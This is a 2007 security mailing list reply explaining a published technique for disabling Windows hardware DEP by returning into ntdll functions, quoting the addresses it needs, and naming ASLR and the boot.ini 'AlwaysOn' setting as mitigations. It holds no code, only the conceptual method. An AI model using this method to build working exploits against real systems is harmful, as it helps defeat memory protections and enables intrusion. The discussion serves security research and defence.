Dailydave mailing list archives

Re: The sky's downward trajectory

From: "Rhys Kidd" <rhyskidd () gmail com>
Date: Mon, 19 Feb 2007 13:28:54 +0900

I'd assume that Immunity's method of bypassing hardware-based DEP ( ie the
NX protect bit in modern CPUs ) builds on the work of skape and Skywing in
Uninformed Journal v2, http://uninformed.org/?v=2&a=4&t=sumry.

The attack relies on first returning to the function in ntdll.dll called
NtSetInformationProcess with a parameter that disables hardware DEP on a
per-process basis. As this function is code the process is allowed to direct
execution flow to it while hardware DEP is still enabled.

"This approach requires the knowledge of three addresses. First, the address
of the mov al, 0x1 / ret equivalent must be known. Fortunately, there are
many occurrences of this type of block, though they may not be as simplistic
as the one described in this document. Second, the address of the start of
the cmp al, 0x1 block inside ntdll!LdrpCheckNXCompatibility must be known.
By depending on two addresses within ntdll, it stands to reason that an
exploit can be more portable than if one were to depend on addresses from
two different DLLs. Finally, the third address is the one that would be the
one that is typically used on targets that didn't have hardware-enforced
DEP, such as a jmp esp or equivalent instruction depending on the
vulnerability in question."

The impact of this method is that an exploit could be modified rather easily
to first disabled DEP before attempting to return into it's own arbitrary
code.

So what does Microsoft provide to make this more secure?

Firstly the push by Michael Howard et al to get ASLR implemented in Vista
beta 2 and above means the addresses within ntdll.dll are going to be
somewhat random, thereby making reliable use of this technique difficult. NX
bit based defenses really should be implemented hand-in-hand with some form
of memory randomisation, as was documented by the PaX project.

Secondly, as Dave mentioned setting "AlwaysOn" in boot.ini should prevent
DEP from being disabled on a per-process basis.

HTH.
Rhys

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave

Current thread:

The sky's downward trajectory Dave Aitel (Feb 17)
- Re: The sky's downward trajectory George Ou (Feb 18)
  - Re: The sky's downward trajectory Dave Aitel (Feb 18)
    - Re: The sky's downward trajectory George Ou (Feb 18)
    - Message not available
    - Re: The sky's downward trajectory Rhys Kidd (Feb 19)
    - Re: The sky's downward trajectory endrazine (Feb 19)
    - Re: The sky's downward trajectory jf (Feb 19)
    - Re: The sky's downward trajectory endrazine (Feb 19)
    - Re: The sky's downward trajectory jf (Feb 19)
    - Re: The sky's downward trajectory Jonathan Wilkins (Feb 19)
    - Re: The sky's downward trajectory Dominique Brezinski (Feb 20)
    - Re: The sky's downward trajectory ol (Feb 20)
    - Re: The sky's downward trajectory ol (Mar 03)
    - Re: The sky's downward trajectory jf (Feb 20)
    - Re: The sky's downward trajectory Jonathan Wilkins (Feb 19)

(Thread continues...)